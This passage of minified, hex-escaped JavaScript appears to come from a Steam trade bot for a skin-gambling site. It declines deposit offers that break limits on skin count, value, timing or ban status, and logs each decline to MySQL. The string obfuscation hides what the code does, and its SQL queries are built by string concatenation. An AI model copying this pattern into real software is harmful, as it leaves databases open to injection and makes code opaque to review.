a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x6d\x6f\x72\x65\x20\x74\x68\x61\x6e\x20"+l+"\x20\x73\x6b\x69\x6e\x73"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b),e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x57\x65\x20\x6f\x6e\x6c\x79\x20\x61\x63\x63\x65\x70\x74\x20\x75\x70\x20\x74\x6f\x20"+l+"\x20\x73\x6b\x69\x6e\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})});var o=a.itemsToReceive,p=0,r=[],s=0;o.forEach(function(d,f,g){return d.appid!=appid?(b=!1,a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x61\x20\x4e\x6f\x6e\x2d"+appname+"\x20\x73\x6b\x69\x6e"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x57\x65\x20\x6f\x6e\x6c\x79\x20\x61\x63\x63\x65\x70\x74\x20"+appname+"\x20\x73\x6b\x69\x6e\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})):(r[f]=[],r[f].name=d.market_name,r[f].color=d.name_color,r[f].url=d.icon_url,r[f].value=0,function(a){var b=r[f].name;nprice=GetPrice(b),r[f].value=parseFloat(nprice),p+=r[f].value}(f),void s++)}),e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x69\x6e\x66\x6f\x60",function(d,f){var t=f[0].value;e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x67\x61\x6d\x65\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27"+t+"\x27",function(d,f,t){if(starttime=f[0].starttime,2147483647!=starttime){var u=Math.round((new Date).getTime()/1e3);if(tl=starttime+GameTime-u,tl<=snipetimer)return b=!1,a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x54\x68\x65\x20\x42\x6f\x74\x20\x77\x6f\x6e\x74\x20\x61\x63\x63\x65\x70\x74\x20\x6c\x61\x73\x74\x20\x73\x65\x63\x6f\x6e\x64\x20\x62\x65\x74\x73"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x6e\x6f\x74\x20\x62\x65\x74\x20\x69\x6e\x20\x74\x68\x65\x20\x6c\x61\x73\x74\x20\x66\x65\x77\x20\x73\x65\x63\x6f\x6e\x64\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})}setTimeout(function(){return 0!=b?p>k?(b=!1,a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x74\x6f\x6f\x20\x6d\x75\x63\x68\x20\x69\x6e\x20\x73\x6b\x69\x6e\x20\x76\x61\x6c\x75\x65"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x64\x65\x70\x6f\x73\x69\x74\x20\x6d\x6f\x72\x65\x20\x74\x68\x61\x6e\x20\x24"+k+"\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})):g>p?(b=!1,a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x62\x65\x6c\x6f\x77\x20\x74\x68\x65\x20\x6d\x69\x6e\x69\x6d\x61\x6c\x20\x62\x65\x74\x20\x61\x6d\x6f\x75\x6e\x74\x20\x28\x24"+g+"\x29"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x4d\x69\x6e\x69\x6d\x75\x6d\x20\x64\x65\x70\x6f\x73\x69\x74\x20\x76\x61\x6c\x75\x65\x3a\x20\x24"+g+"\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})):s>l?(b=!1,a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x74\x6f\x6f\x20\x6d\x61\x6e\x79\x20\x73\x6b\x69\x6e\x73"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x57\x65\x20\x6f\x6e\x6c\x79\x20\x61\x63\x63\x65\x70\x74\x20\x75\x70\x20\x74\x6f\x20"+l+"\x20\x73\x6b\x69\x6e\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})):(b=!0)?void e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x69\x6e\x66\x6f\x60",function(d,f){var g=f[0].value;e.query("\x53\x45\x4c\x45\x43\x54\x20\x43\x4f\x55\x4e\x54\x28\x76\x61\x6c\x75\x65\x29\x20\x61\x73\x20\x73\x6b\x69\x6e\x73\x69\x6e\x2c\x53\x55\x4d\x28\x76\x61\x6c\x75\x65\x29\x20\x61\x73\x20\x6d\x6f\x6e\x65\x79\x69\x6e\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x67\x61\x6d\x65"+g+"\x60\x20\x57\x48\x45\x52\x45\x20\x60\x75\x73\x65\x72\x69\x64\x60\x3d\x27"+c+"\x27",function(d,f,t){if(skinsin=f[0].skinsin,skinsin+=s,moneyin=f[0].moneyin,moneyin+=p,skinsin>l)return a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x52\x45\x43\x48\x45\x43\x4b\x20\x2d\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x74\x6f\x6f\x20\x6d\x61\x6e\x79\x20\x73\x6b\x69\x6e\x73"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x6e\x6f\x74\x20\x64\x65\x70\x6f\x73\x69\x74\x20\x6d\x6f\x72\x65\x20\x74\x68\x61\x6e\x20"+l+"\x20\x73\x6b\x69\x6e\x73\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){});if(moneyin>k)return a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x52\x45\x43\x48\x45\x43\x4b\x20\x2d\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x74\x6f\x6f\x20\x6d\x75\x63\x68\x20\x69\x6e\x20\x73\x6b\x69\x6e\x20\x76\x61\x6c\x75\x65"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x64\x65\x70\x6f\x73\x69\x74\x20\x6d\x6f\x72\x65\x20\x74\x68\x61\x6e\x20\x24"+k+"\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){});for(var u=0;s>u;u++){if(0==r[u].value||!r[u].value)return b=!1,a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x52\x45\x43\x48\x45\x43\x4b\x20\x2d\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x49\x73\x73\x75\x65\x73\x20\x28\x43\x61\x6e\x27\x74\x20\x67\x65\x74\x20\x74\x68\x65\x20\x73\x6b\x69\x6e\x27\x73\x20\x76\x61\x6c\x75\x65\x29"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x69\x73\x73\x75\x65\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){});if(!n(r[u].value))return a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x52\x45\x43\x48\x45\x43\x4b\x20\x2d\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x49\x73\x73\x75\x65\x73\x20\x28\x43\x61\x6e\x27\x74\x20\x67\x65\x74\x20\x74\x68\x65\x20\x73\x6b\x69\x6e\x27\x73\x20\x76\x61\x6c\x75\x65\x29\x20"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x69\x73\x73\x75\x65\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){});if(-1!=r[u].name.indexOf("\x53\x6f\x75\x76\x65\x6e\x69\x72"))return b=!1,a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x61\x20\x53\x6f\x75\x76\x65\x6e\x69\x72\x20\x53\x6b\x69\x6e"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x4e\x6f\x20\x73\x6f\x75\x76\x65\x6e\x69\x72\x20\x73\x6b\x69\x6e\x73\x20\x61\x6c\x6c\x6f\x77\x65\x64\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){});
  128. }e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60\x75\x73\x65\x72\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x65\x61\x6d\x69\x64\x60\x3d\x27"+c+"\x27",function(d,f,k){return d?(console.log("\x4d\x59\x53\x51\x4c\x20\x45\x72\x72\x6f\x72\x3a\x20"+d),a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x4d\x59\x53\x51\x4c\x20\x45\x72\x72\x6f\x72\x20\x28\x61\x73\x20\x73\x65\x65\x6e\x20\x61\x62\x6f\x76\x65\x29\x20"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x4d\x59\x53\x51\x4c\x20\x45\x72\x72\x6f\x72\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})):0==f.length?void a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x69\x73\x20\x6e\x6f\x74\x20\x69\x6e\x20\x74\x68\x65\x20\x4d\x59\x53\x51\x4c\x20\x44\x61\x74\x61\x62\x61\x73\x65"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}):(ban=f[0].ban,tlink=f[0].tlink,1==ban?(b=!1,a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x69\x73\x20\x62\x61\x6e\x6e\x65\x64"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x61\x72\x65\x20\x62\x61\x6e\x6e\x65\x64\x20\x66\x72\x6f\x6d\x20\x62\x65\x74\x74\x69\x6e\x67\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})):tlink?void e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x67\x61\x6d\x65\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27"+g+"\x27",function(b,d,e){itemsin=d[0].itemsnum,q(a,c,r,g,h,i,s,o,m,itemsin)}):(a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x64\x6f\x65\x73\x6e\x27\x74\x20\x68\x61\x76\x65\x20\x61\x20\x54\x72\x61\x64\x65\x4c\x69\x6e\x6b\x20\x73\x65\x74\x20"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x4e\x6f\x20\x54\x72\x61\x64\x65\x20\x55\x52\x4c\x20\x53\x65\x74\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})))})})}):(a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x6e\x6b\x6f\x7